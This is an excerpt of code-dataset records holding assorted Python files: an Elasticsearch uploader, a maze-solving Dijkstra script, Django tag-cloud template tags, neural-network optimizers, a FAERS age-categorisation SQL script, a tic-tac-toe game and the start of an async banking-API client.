x\n","sub_path":"ifconfig_reg.py","file_name":"ifconfig_reg.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"351883943","text":"# Copyright AlertAvert.com (c) 2017. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport json\nimport os\n\nimport requests\n\nimport importxls\n\n\nclass ElasticsearchConnector(object):\n HEALTH = \"_cat/health\"\n HEADERS = {'Accept': 'application/json'}\n METADATA_DOCTYPE = \"metadata\"\n\n def __init__(self, index, doctype, host='localhost', port=9200):\n self._url = \"http://{}:{}\".format(host, port)\n self._index = index\n self._doctype = doctype\n\n def upload(self, data):\n \"\"\" Uploads the data to the Elasticsearch server.\n \n :param data: the plants' database\n :type data: list[dict]\n \n :return: None \n \"\"\"\n assert isinstance(data, list)\n\n print(\"Connecting to:\", self._url)\n res = requests.get(\"{}/{}\".format(self._url, ElasticsearchConnector.HEALTH),\n headers=ElasticsearchConnector.HEADERS)\n\n if not res.ok:\n print(\"Server unavailable\")\n return\n\n status = res.json()[0].get('status')\n print(\"Status:\", status)\n if status == 'red':\n print(\"Elasticsearch server is not in a healthy state, aborting uploads\")\n return\n\n print(\"Inserting {} items in the '{}' index\".format(len(data), self._index))\n count = 0\n for item in data:\n if 'botanical_name' not in item:\n continue\n res = requests.post(\"{}/{}/{}\".format(self._url, self._index, self._doctype),\n headers=ElasticsearchConnector.HEADERS, json=item)\n if not res.ok:\n print(\"Failed ({}): {}\".format(res.status_code, res.reason))\n continue\n count += 1\n print(\"SUCCESS {} records uploaded\".format(count))\n\n def upload_metadata(self, upload_id, upload_metadata):\n res = requests.post(\"{}/{}/{}/{}\".format(self._url, self._index,\n ElasticsearchConnector.METADATA_DOCTYPE,\n upload_id),\n headers=ElasticsearchConnector.HEADERS, json=upload_metadata)\n if not res.ok:\n print(\"Failed ({}): {}\".format(res.status_code, res.reason))\n return res.ok\n\n def create_index(self):\n print(\"Creating '{}' index\".format(self._index))\n res = requests.put(\"{}/{}\".format(self._url, self._index))\n if not res.ok:\n print(\"Failed to create the index, aborting\")\n exit(1)\n\n def wipe_index(self):\n print(\"Deleting index {} from Elasticsearch server\".format(self._index))\n requests.delete(\"{}/{}\".format(self._url, self._index))\n\n def rebuild_index(self, local_path, keep=False):\n if not os.path.exists(local_path):\n print(\"File {} does not exist\".format(local_path))\n return\n self.wipe_index()\n data, stats = importxls.import_xls(local_path)\n self.upload(data)\n print(\"Data uploaded from {}\".format(local_path))\n if not keep:\n os.remove(local_path)\n print(\"Data file {} removed\".format(local_path))\n if self.upload_metadata(999, stats):\n return 999\n\n def find_one(self, doc_id):\n return requests.get(\"{}/{}/{}/{}\".format(self._url, self._index, self._doctype, doc_id))\n\n def find_metadata(self, doc_id):\n return requests.get(\"{}/{}/{}/{}\".format(self._url, self._index,\n ElasticsearchConnector.METADATA_DOCTYPE,\n doc_id))\n\n def search_for(self, query):\n return requests.post(\"{}/{}/_search\".format(self._url, self._index),\n data=json.dumps(query))\n","sub_path":"elasticsearch_connector.py","file_name":"elasticsearch_connector.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"179058484","text":"# -*- encoding: utf-8 -*-\nimport sys\nimport heapq\nr_input = sys.stdin.readline\n\nN, M = map(int, r_input().split()) # 미로의 크기\n\nmaze = {}\ncost = {}\n\ndx = [0, 1, -1, 0]\ndy = [1, 0, 0, -1]\n\nfor i in range(M):\n maze[i] = []\n\n for c in r_input().rstrip():\n maze[i].append(int(c))\n\n cost[i] = ['INF'] * N\n\ncost[0][0] = 0\n\nif M == 1:\n print(maze[0].count(1))\n exit()\n\nif N == 1:\n total = 0\n for i in range(M):\n total += maze[i][0]\n print(total)\n exit()\n\nqueue = []\n\nfor i in range(2):\n heapq.heappush(queue, (maze[dx[i]][dy[i]], dx[i], dy[i]))\n cost[dx[i]][dy[i]] = maze[dx[i]][dy[i]]\n\n\ndef dijkstra():\n while queue:\n mini = heapq.heappop(queue)\n min_cost = mini[0]\n min_x = mini[1]\n min_y = mini[2]\n\n for i in range(4):\n tmp_x = min_x + dx[i]\n tmp_y = min_y + dy[i]\n\n if 0 <= tmp_x < M and 0 <= tmp_y < N:\n tmp_cost = min_cost + maze[tmp_x][tmp_y]\n\n if cost[tmp_x][tmp_y] == 'INF' or tmp_cost < cost[tmp_x][tmp_y]:\n cost[tmp_x][tmp_y] = tmp_cost\n heapq.heappush(queue, (tmp_cost, tmp_x, tmp_y))\n\n\ndijkstra()\n\nprint(cost[M-1][N-1])\n","sub_path":"Algorithm/Baekjoon/01261 알고스팟/1261.py","file_name":"1261.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"381392636","text":"from django import template\nfrom django.db.models import Count\nfrom django.core.exceptions import FieldError\nfrom django.db.models.loading import get_model\n\nfrom templatetag_sugar.register import tag\nfrom templatetag_sugar.parser import Variable, Optional, Model, Required\n\nfrom taggit import VERSION as TAGGIT_VERSION\nfrom taggit_templatetags import settings\n\nT_MAX = getattr(settings, 'TAGCLOUD_MAX', 6.0)\nT_MIN = getattr(settings, 'TAGCLOUD_MIN', 1.0)\n\nregister = template.Library()\n\ndef get_queryset(forvar=None):\n count_field = None\n if forvar is None:\n # get all tags\n # tagged_things = settings.TAGGED_ITEM_MODEL.objects.all().distinct\n queryset = settings.TAG_MODEL.objects.all()\n else:\n # extract app label and model name\n beginning, applabel, model = None, None, None\n try:\n beginning, applabel, model = forvar.rsplit('.', 2)\n except ValueError:\n try:\n applabel, model = forvar.rsplit('.', 1)\n except ValueError:\n applabel = forvar\n applabel = applabel.lower()\n \n # filter tagged items \n if model is None:\n # Get tags for a whole app\n queryset = settings.TAGGED_ITEM_MODEL.objects.filter(content_type__app_label=applabel)\n tag_ids = queryset.values_list('tag_id', flat=True)\n queryset = settings.TAG_MODEL.objects.filter(id__in=tag_ids)\n else:\n # Get tags for a model\n model = model.lower()\n if \":\" in model:\n model, manager_attr = model.split(\":\", 1)\n else:\n manager_attr = \"tags\"\n model_class = get_model(applabel, model)\n manager = getattr(model_class, manager_attr)\n queryset = manager.all()\n through_opts = manager.through._meta\n count_field = (\"%s_%s_items\" % (through_opts.app_label,\n through_opts.object_name)).lower() #old style\n\n if count_field is None:\n # if \n relname = settings.TAGGED_ITEM_MODEL._meta.get_field_by_name('tag')[0].rel.related_name\n return queryset.annotate(num_times=Count(relname))\n else:\n return queryset.annotate(num_times=Count(count_field))\n\n\n\ndef get_weight_fun(t_min, t_max, f_min, f_max):\n def weight_fun(f_i, t_min=t_min, t_max=t_max, f_min=f_min, f_max=f_max):\n # Prevent a division by zero here, found to occur under some\n # pathological but nevertheless actually occurring circumstances.\n if f_max == f_min:\n mult_fac = 1.0\n else:\n mult_fac = float(t_max-t_min)/float(f_max-f_min)\n \n return t_max - (f_max-f_i)*mult_fac\n return weight_fun\n\n@tag(register, {Required('asvar'): Variable(), Optional('for_obj'): Variable(), Optional('count'): Variable()}) \ndef get_taglist(context, asvar, for_obj=None, count=None):\n # print asvar\n # print for_obj\n # print count\n queryset = get_queryset(for_obj) \n queryset = queryset.order_by('-num_times') \n if count:\n context[asvar] = queryset[:int(count)]\n else:\n context[asvar] = queryset\n \n return ''\n\n@tag(register, {Optional('as'): Variable(), Optional('for'): Variable(), Optional('count'): Variable()})\ndef get_tagcloud(context, asvar=None, forvar=None, count=None):\n queryset = get_queryset(forvar)\n num_times = queryset.values_list('num_times', flat=True)\n if(len(num_times) == 0):\n context[asvar] = queryset\n return ''\n weight_fun = get_weight_fun(T_MIN, T_MAX, min(num_times), max(num_times))\n if count:\n queryset = queryset.order_by('name')[:int(count)-1]\n else:\n queryset = queryset.order_by('name')\n for tag in queryset:\n tag.weight = weight_fun(tag.num_times)\n context[asvar] = queryset\n return ''\n \ndef include_tagcloud(forvar=None):\n return {'forvar': forvar}\n\ndef include_taglist(forvar=None):\n return {'forvar': forvar}\n \nregister.inclusion_tag('taggit_templatetags/taglist_include.html')(include_taglist)\nregister.inclusion_tag('taggit_templatetags/tagcloud_include.html')(include_tagcloud)\n","sub_path":"taggit_templatetags/templatetags/taggit_extras.py","file_name":"taggit_extras.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"228377250","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# import local modules\nfrom coding_deep_neural_network_from_scratch import (initialize_parameters,\n L_model_forward,\n compute_cost,\n L_model_backward,\n update_parameters,\n accuracy)\n\n\ndef random_mini_batches(X, Y, mini_batch_size=64, seed=0):\n \"\"\"\n Creates a list of random minibatches from (X, Y)\n\n Arguments:\n X -- input data, shape: input size, number of examples\n Y -- \"label\" vector, shape: 1, number of examples\n mini_batch_size -- size of the mini-batches, integer\n\n Returns:\n mini_batches -- list of synchronous (mini_batch_X, mini_batch_Y)\n \"\"\"\n np.random.seed(seed)\n m = X.shape[1]\n mini_batches = []\n\n # shuffle training set\n permutation = np.random.permutation(m)\n shuffle_X = X[:, permutation]\n shuffle_Y = Y[:, permutation]\n\n num_complete_minibatches = m // mini_batch_size\n\n for k in range(num_complete_minibatches):\n mini_batch_X = shuffle_X[:, k*mini_batch_size:(k + 1)*mini_batch_size]\n mini_batch_Y = shuffle_Y[:, k*mini_batch_size:(k + 1)*mini_batch_size]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n\n # check if there are some examples left if m % batch_size != 0\n if m % mini_batch_size != 0:\n mini_batch_X = shuffle_X[:, num_complete_minibatches*mini_batch_size:]\n mini_batch_Y = shuffle_Y[:, num_complete_minibatches*mini_batch_size:]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n\n return mini_batches\n\n\ndef initialize_momentum(parameters):\n \"\"\"\n Initializes the velocity as a python dictionary with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n - values: numpy arrays of zeros of the same shape as the\n corresponding gradients/parameters.\n\n Arguments:\n parameters -- python dictionary containing parameters.\n\n Returns:\n v -- python dictionary containing the current velocity.\n \"\"\"\n L = len(parameters) // 2\n v = {}\n\n for l in range(1, L + 1):\n v[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n v[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n return v\n\n\ndef update_parameters_with_momentum(parameters, grads, v, beta, learning_rate):\n \"\"\"\n Update parameters using Momentum\n\n Arguments:\n parameters -- python dictionary containing your parameters:\n grads -- python dictionary containing your gradients for each parameters:\n v -- python dictionary containing the current velocity:\n beta -- the momentum hyperparameter --> scalar\n learning_rate -- the learning rate --> scalar\n\n Returns:\n parameters -- python dictionary containing your updated parameters\n v -- python dictionary containing your updated velocities\n \"\"\"\n L = len(parameters) // 2\n\n for l in range(1, L + 1):\n # update momentum velocity\n v[\"dW\" + str(l)] =\\\n beta * v[\"dW\" + str(l)] + (1 - beta) * grads[\"dW\" + str(l)]\n v[\"db\" + str(l)] =\\\n beta * v[\"db\" + str(l)] + (1 - beta) * grads[\"db\" + str(l)]\n # update parameters\n parameters[\"W\" + str(l)] =\\\n parameters[\"W\" + str(l)] - learning_rate * v[\"dW\" + str(l)]\n parameters[\"b\" + str(l)] =\\\n parameters[\"b\" + str(l)] - learning_rate * v[\"db\" + str(l)]\n\n return parameters, v\n\n\ndef initialize_rmsprop(parameters):\n \"\"\"\n Initializes the velocity as a python dictionary with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n - values: numpy arrays of zeros of the same shape as the\n corresponding gradients/parameters.\n\n Arguments:\n parameters -- python dictionary containing parameters.\n\n Returns:\n s -- python dictionary containing the current velocity.\n \"\"\"\n L = len(parameters) // 2\n s = {}\n\n for l in range(1, L + 1):\n s[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n s[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n return s\n\n\ndef update_parameters_with_rmsprop(parameters, grads, s, beta, learning_rate,\n epsilon=1e-8):\n \"\"\"\n Update parameters using Momentum\n\n Arguments:\n parameters -- python dictionary containing parameters:\n grads -- python dictionary containing gradients for each parameters:\n s -- python dictionary containing the current velocity:\n beta -- the momentum hyperparameter --> scalar\n learning_rate -- the learning rate --> scalar\n epsilon -- hyperparameter preventing division by zero in Adam updates\n\n Returns:\n parameters -- python dictionary containing your updated parameters\n v -- python dictionary containing updated velocities\n \"\"\"\n L = len(parameters) // 2\n\n for l in range(1, L + 1):\n # update momentum velocity\n s[\"dW\" + str(l)] =\\\n beta * s[\"dW\" + str(l)] +\\\n (1 - beta) * np.square(grads[\"dW\" + str(l)])\n s[\"db\" + str(l)] =\\\n beta * s[\"db\" + str(l)] +\\\n (1 - beta) * np.square(grads[\"db\" + str(l)])\n # update parameters\n parameters[\"W\" + str(l)] -= (learning_rate * grads[\"dW\" + str(l)])\\\n / (np.sqrt(s[\"dW\" + str(l)] + epsilon))\n parameters[\"b\" + str(l)] -= (learning_rate * grads[\"db\" + str(l)])\\\n / (np.sqrt(s[\"db\" + str(l)] + epsilon))\n\n return parameters, s\n\n\ndef initialize_adam(parameters):\n \"\"\"\n Initializes v and s as two python dictionaries with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n - values: numpy arrays of zeros of the same shape as the\n corresponding gradients/parameters.\n\n Arguments:\n parameters -- python dictionary containing your parameters.\n\n v -- python dictionary that will contain the exponentially weighted\n average of the gradient.\n s -- python dictionary that will contain the exponentially weighted\n average of the squared gradient.\n \"\"\"\n L = len(parameters) // 2\n v = {}\n s = {}\n\n for l in range(1, L + 1):\n v[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n v[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n s[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n s[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n return v, s\n\n\ndef update_parameters_with_adam(parameters, grads, v, s, t, learning_rate,\n beta1=0.9, beta2=0.999, epsilon=1e-8):\n \"\"\"\n Update parameters using Adam\n\n Arguments:\n parameters -- python dictionary containing parameters:\n grads -- python dictionary containing gradients for each parameters:\n v -- Adam variable, moving average of the first gradient\n s -- Adam variable, moving average of the squared gradient\n learning_rate -- the learning rate, scalar.\n beta1 -- Exponential decay hyperparameter for the first moment estimates\n beta2 -- Exponential decay hyperparameter for the second moment estimates\n epsilon -- hyperparameter preventing division by zero in Adam updates\n\n Returns:\n parameters -- python dictionary containing updated parameters\n v -- Adam variable, moving average of the first gradient\n s -- Adam variable, moving average of the squared gradient\n \"\"\"\n L = len(parameters) // 2\n v_corrected = {}\n s_corrected = {}\n\n for l in range(1, L + 1):\n # update the moving avergae of both first gradient and squared gradient\n v[\"dW\" + str(l)] = beta1 * v[\"dW\" + str(l)] +\\\n (1 - beta1) * grads[\"dW\" + str(l)]\n v[\"db\" + str(l)] = beta1 * v[\"db\" + str(l)] +\\\n (1 - beta1) * grads[\"db\" + str(l)]\n s[\"dW\" + str(l)] = beta2 * s[\"dW\" + str(l)] +\\\n (1 - beta2) * np.square(grads[\"dW\" + str(l)])\n s[\"db\" + str(l)] = beta2 * s[\"db\" + str(l)] + \\\n (1 - beta2) * np.square(grads[\"db\" + str(l)])\n\n # compute the corrected-bias estimate of the moving averages\n v_corrected[\"dW\" + str(l)] = v[\"dW\" + str(l)] / (1 - beta1**t)\n v_corrected[\"db\" + str(l)] = v[\"db\" + str(l)] / (1 - beta1**t)\n s_corrected[\"dW\" + str(l)] = s[\"dW\" + str(l)] / (1 - beta2**t)\n s_corrected[\"db\" + str(l)] = s[\"db\" + str(l)] / (1 - beta2**t)\n\n # update parameters\n parameters[\"W\" + str(l)] -= (\n learning_rate * v_corrected[\"dW\" + str(l)])\\\n / (np.sqrt(s_corrected[\"dW\" + str(l)] + epsilon))\n parameters[\"b\" + str(l)] -= (\n learning_rate * v_corrected[\"db\" + str(l)])\\\n / (np.sqrt(s_corrected[\"db\" + str(l)] + epsilon))\n\n return parameters, v, s\n\n\ndef model(X, Y, layers_dims, optimizer=\"adam\", learning_rate=0.01,\n mini_batch_size=64, beta=0.9, beta1=0.9, beta2=0.999, epsilon=1e-8,\n num_epochs=3000, print_cost=True, activation_fn=\"relu\"):\n \"\"\"\n Implements multi-neural network model which can be run in different\n optimizer modes.\n\n Arguments:\n X -- input data, shape: number of features, number of examples\n Y -- label vector, shape: 1, number of examples\n layers_dims -- python list, containing the size of each layer\n optimizer -- \"mb\", \"momentum\", \"rmsprop\", or \"adam\".\n learning_rate -- the learning rate --> scalar.\n mini_batch_size -- the size of a mini batch\n beta -- Momentum/RMSProp hyperparameter\n beta1 -- Exponential decay hyperparameter for the past gradients\n beta2 -- Exponential decay hyperparameter for the past squared gradients\n epsilon -- hyperparameter preventing division by zero\n num_epochs -- number of epochs\n print_cost -- True to print the cost every 1000 epochs\n activation_fn -- function to be used on hidden layers: \"relu\", or \"tanh\"\n\n Returns:\n parameters -- python dictionary containing updated parameters\n \"\"\"\n # set random seed to get consistent output\n seed = 1\n np.random.seed(seed)\n\n # initialize parameters\n parameters = initialize_parameters(layers_dims)\n\n # initialize moving averages based on optimizer modes\n assert(optimizer == \"mb\" or optimizer == \"momentum\" or\n optimizer == \"rmsprop\" or optimizer == \"adam\")\n\n if optimizer == \"momentum\":\n v = initialize_momentum(parameters)\n\n elif optimizer == \"rmsprop\":\n s = initialize_rmsprop(parameters)\n\n elif optimizer == \"adam\":\n v, s = initialize_adam(parameters)\n t = 0\n\n # initialize costs list\n costs = []\n\n # iterate over number of epochs\n for epoch in range(num_epochs):\n # split the training data into mini batches\n seed += 1\n mini_batches = random_mini_batches(X, Y, mini_batch_size, seed=seed)\n\n # iterate over mini batches\n for mini_batch in mini_batches:\n mini_batch_X, mini_batch_Y = mini_batch\n\n # compute fwd prop\n AL, caches = L_model_forward(\n mini_batch_X, parameters, activation_fn)\n\n # compute cost\n cost = compute_cost(AL, mini_batch_Y)\n\n # compute gradients\n grads = L_model_backward(AL, mini_batch_Y, caches, activation_fn)\n\n # update parameters\n if optimizer == \"mb\":\n parameters = update_parameters(\n parameters, grads, learning_rate)\n\n elif optimizer == \"momentum\":\n parameters, v = update_parameters_with_momentum(\n parameters, grads, v, beta, learning_rate)\n\n elif optimizer == \"rmsprop\":\n parameters, s = update_parameters_with_rmsprop(\n parameters, grads, s, beta, learning_rate, epsilon)\n\n elif optimizer == \"adam\":\n t += 1\n parameters, v, s = update_parameters_with_adam(\n parameters, grads, v, s, t, learning_rate, beta1, beta2,\n epsilon)\n\n # compute epoch cost\n AL, caches = L_model_forward(\n X_train, parameters, activation_fn)\n cost = compute_cost(AL, Y_train)\n\n if epoch % 100 == 0:\n costs.append(cost)\n\n # plot the cost\n plt.plot(costs)\n plt.ylabel('Cost')\n plt.xlabel('Epochs (per hundreds)')\n plt.title(\"Learning rate = \" + str(learning_rate))\n plt.show()\n\n return parameters\n","sub_path":"scripts/optimization_algorithms.py","file_name":"optimization_algorithms.py","file_ext":"py","file_size_in_byte":12598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"301797535","text":"# -*- coding:utf-8 -*-\n# 計算DEMO中的AGE_TYPE並寫入資料庫\nimport time\nimport pyodbc\n\ndb_name = \"FAERS\"\n\nselect_age = \"SELECT PRIMARYID, AGE, AGE_COD FROM {0};\"\nget_columns = \"SELECT Name FROM SysColumns WHERE id=Object_Id('{0}')\"\nadd_type_column = \"ALTER TABLE {0} ADD AGE_TYPE tinyint;\"\nupdate_age_type = \"UPDATE {0} SET AGE_TYPE = {1} WHERE PRIMARYID = {2}\"\n\n\ndef get_age_type(age_data):\n \"\"\"輸入AGE跟AGE_COD,計算AGE_TYPE\n \"\"\"\n age, age_cod = age_data\n if age == None or age_cod == None:\n return None\n # 單位從小到大,例如輸入AGE_COD是秒SEX,則會先被轉成分鐘MIN,最後會變成年YR\n if age_cod == \"SEC\":\n age/=60\n age_cod=\"MIN\"\n if age_cod == \"MIN\":\n age/=60\n age_cod=\"HR\"\n if age_cod == \"HR\":\n age/=24\n age_cod=\"DY\"\n if age_cod == \"DY\":\n age/=7\n age_cod=\"WK\"\n if age_cod == \"WK\":\n age/=4\n age_cod=\"MON\"\n if age_cod == \"MON\":\n age/=12\n age_cod=\"YR\"\n if age_cod == \"DEC\":\n age*=10\n age_cod=\"YR\"\n if age_cod != \"YR\":\n return None\n # 年齡離散化規則參考網站上整理的表格\n if age < 0: # 0代表有資料但是不合理\n return 0\n if age < 1 :#Infant, Newborn\n return 1\n if age < 2 :#Infant\n return 2\n if age < 5 :#Child Preschool\n return 3\n if age < 12:#Child\n return 4\n if age < 18:#Adolescent\n return 5\n if age < 24:#Young Adult\n return 6\n if age < 44:#Adult\n return 7\n if age < 64:#Middle Aged\n return 8\n if age < 79:#Aged\n return 9\n if age < 123:#Aged+\n return 10\n return 0\n\ndef set_db_age_type(quarter):\n \"\"\"一次處理一季,在DEMO加入AGE_TYPE欄位,並依AGE和AGE_COD算出。\n \"\"\"\n data = {}\n with pyodbc.connect(\"driver={SQL Server};server=localhost;Trusted_Connection=yes\", database=db_name) as con:\n with con.cursor() as cursor:\n row = cursor.execute(select_age.format(quarter))\n for pid, age, age_type in row: # 先把該季年齡值與單位取出\n try:\n data[pid] = (float(age), age_type.strip())\n except:\n continue\n print(\"{0} >> {1} records\".format(quarter, len(data)))\n # 如果表內沒有 AGE_TYPE 欄位要先新增\n columns = [c for c, in cursor.execute(get_columns.format(quarter))]\n if \"AGE_TYPE\" not in columns:\n cursor.execute(add_type_column.format(quarter))\n # 設定AGE_TYPE\n for pid in data:\n age_type = get_age_type(data[pid])\n if age_type: # 有回傳值\n cursor.execute(update_age_type.format(quarter, age_type, pid))\n else:\n cursor.execute(update_age_type.format(quarter, \"NULL\", pid))\n cursor.commit()\n\ndef main():\n with pyodbc.connect(\"driver={SQL Server};server=localhost;Trusted_Connection=yes\", database=db_name) as con:\n with con.cursor() as cursor:\n tables = [t for t, in cursor.execute(\"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.Tables;\") if \"DEMO\" in t]\n tables.sort()\n for quarter in tables:\n set_db_age_type(quarter)\n\nif __name__ == \"__main__\":\n print(time.asctime(time.localtime(time.time())))\n main()\n print(time.asctime(time.localtime(time.time())))\n","sub_path":"scripts/set_age_type.py","file_name":"set_age_type.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"522350149","text":"class Board_game():\n def __init__(self):\n self.wins_coord = [(1, 2, 3), (4, 5, 6,), (7, 8, 9), (1, 4, 7), (2, 5, 8), (3, 6, 9), (1, 5, 9), (3, 5, 7)]\n self.board = list(range(1, 10))\n\n\n def draf_board(self):\n\n print('-------------')\n for i in range(3):\n print('|', self.board[0 + i * 3], '|', self.board[1 + i * 3], '|', self.board[2 + i * 3], '|')\n print('-------------')\n\n\n\n def take_input(self,playar_token):\n while True:\n value = input('Куда поставить: '+playar_token + '?')\n if not (value in '123456789'):\n print('Ошибочный вывод.Повторите.')\n continue\n value = int(value)\n if str(self.board[value - 1]) in 'xo':\n print('Эта клетка уже занята')\n continue\n self.board[value - 1] = playar_token\n break\n\n def chek_win(self):\n\n for each in self.wins_coord:\n if (self.board[each[0] - 1]) == (self.board[each[1] - 1]) == (self.board[each[2] - 1]):\n return self.board[each[1] - 1]\n else:\n return False\n\n\n def main(self):\n\n counter = 0\n while True:\n self.draf_board()\n if counter % 2 == 0:\n self.take_input('x')\n else:\n self.take_input('o')\n if counter > 3:\n winner = self.chek_win()\n if winner:\n self.draf_board()\n print(winner, \"выиграл!\")\n break\n counter += 1\n if counter > 8:\n self.draf_board()\n print('Ничья!')\n break\n\ng = Board_game()\ng.main()","sub_path":"крестики-нолики1.py","file_name":"крестики-нолики1.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"174463185","text":"\"\"\"\r\nMIT License\r\n\r\nCopyright (c) 2021 Ali Fayaz (Quill) (quillfires)\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\"\"\"\r\nimport asyncio\r\nfrom asyncio import ensure_future, Future, iscoroutine\r\nfrom collections import defaultdict, OrderedDict\r\nfrom threading import Lock\r\nfrom .core.http import HTTPSession\r\nfrom .core.errors import *\r\n\r\n\r\nclass asyncBML():\r\n def __init__(self, *, loop=None, username=None, password=None):\r\n loop = loop or asyncio.get_event_loop()\r\n self.http = HTTPSession(loop=loop, username=username, password=password)\r\n self._events = defaultdict(OrderedDict)\r\n self.transactions = []\r\n self._loop = loop\r\n self._lock = Lock()\r\n\r\n async def close(self):\r\n \"\"\"|coro|\r\n Clear the session\r\n\r\n \"\"\"\r\n await self.http.close()\r\n\r\n async def get_accounts(self):\r\n \"\"\"|coro|\r\n\r\n Method which retrieves all the accounts.\r\n\r\n Returns\r\n ---------\r\n list: accounts\r\n a list of disctionary objects containing all the accounts.\r\n [{account1}, {account2}, {account3}]\r\n \"\"\"\r\n data = await self.http.get_all_accounts()\r\n return data\r\n\r\n def event(self, event, f=None):\r\n \"\"\"Registers the function ``f`` to the event name ``event``.\r\n If ``f`` isn't provided, this method returns a function that\r\n takes ``f`` as a callback; in other words, you can use this method\r\n as a decorator, like so:\r\n @bank.event('new_transaction')\r\n async def data_handler(data):\r\n print(data)\r\n In both the decorated and undecorated forms, the event handler is\r\n returned. The upshot of this is that you can call decorated handlers\r\n directly\r\n\r\n Note\r\n --------\r\n Will fire all the transactions within 24 hrs at the app reboot.\r\n Use a db to make sure that you arnt notified of the same transaction.\r\n \"\"\"\r\n def _on(f):\r\n self._add_event_handler(event, f, f)\r\n return f\r\n if f is None:\r\n return _on\r\n else:\r\n return _on(f)\r\n\r\n def _add_event_handler(self, event, k, v):\r\n self.emit('new_listener', event, k)\r\n with self._lock:\r\n self._events[event][k] = v\r\n\r\n def _emit_handle_potential_error(self, event, error):\r\n if event == 'error':\r\n if error:\r\n raise error\r\n else:\r\n raise ClientError(\"Uncaught, unspecified 'error' event.\")\r\n\r\n def _call_handlers(self, event, args, kwargs):\r\n handled = False\r\n with self._lock:\r\n funcs = list(self._events[event].values())\r\n for f in funcs:\r\n self._emit_run(f, args, kwargs)\r\n handled = True\r\n return handled\r\n\r\n def emit(self, event, *args, **kwargs):\r\n handled = self._call_handlers(event, args, kwargs)\r\n if not handled:\r\n self._emit_handle_potential_error(event, args[0] if args else None)\r\n return handled\r\n\r\n def _emit_run(self, f, args, kwargs):\r\n try:\r\n coro = f(*args, **kwargs)\r\n except Exception as exc:\r\n self.emit('error', exc)\r\n else:\r\n if iscoroutine(coro):\r\n if self._loop:\r\n f = ensure_future(coro, loop=self._loop)\r\n else:\r\n f = ensure_future(coro)\r\n elif isinstance(coro, Future):\r\n f = coro\r\n else:\r\n f = None\r\n\r\n if f:\r\n @f.add_done_callback\r\n def _callback(f):\r\n if f.cancelled():\r\n return\r\n\r\n exc = f.exception()\r\n if exc:\r\n self.emit('error', exc)\r\n\r\n async def get_contacts(self):\r\n \"\"\"|coro|\r\n\r\n Method which retrieves all the contacts.\r\n\r\n Returns\r\n ---------\r\n list: contacts\r\n a list of disctionary objects containing all the details for each contacts.\r\n [{contact1}, {contact2}, {contact3}]\r\n\r\n Raises\r\n --------\r\n ClientError\r\n Bad request while fetching contacts.\r\n HTTPException\r\n Failed to login.\r\n \"\"\"\r\n data = await self.http.get_contacts()\r\n return data\r\n \r\n async def add_contact(self, name=None, account=None):\r\n \"\"\"|coro|\r\n\r\n Method to add a contact.\r\n\r\n Returns\r\n ---------\r\n dict: contact\r\n a dictionary object of the added contact\r\n {contact}\r\n\r\n Raises\r\n --------\r\n MissingRequiredFields\r\n Missing a required field (account number or name).\r\n InvalidContent\r\n Invalid account number.\r\n ClientError\r\n Bad request while fetching contacts.\r\n HTTPException\r\n Failed to login.\r\n DuplicateContent\r\n Account number is 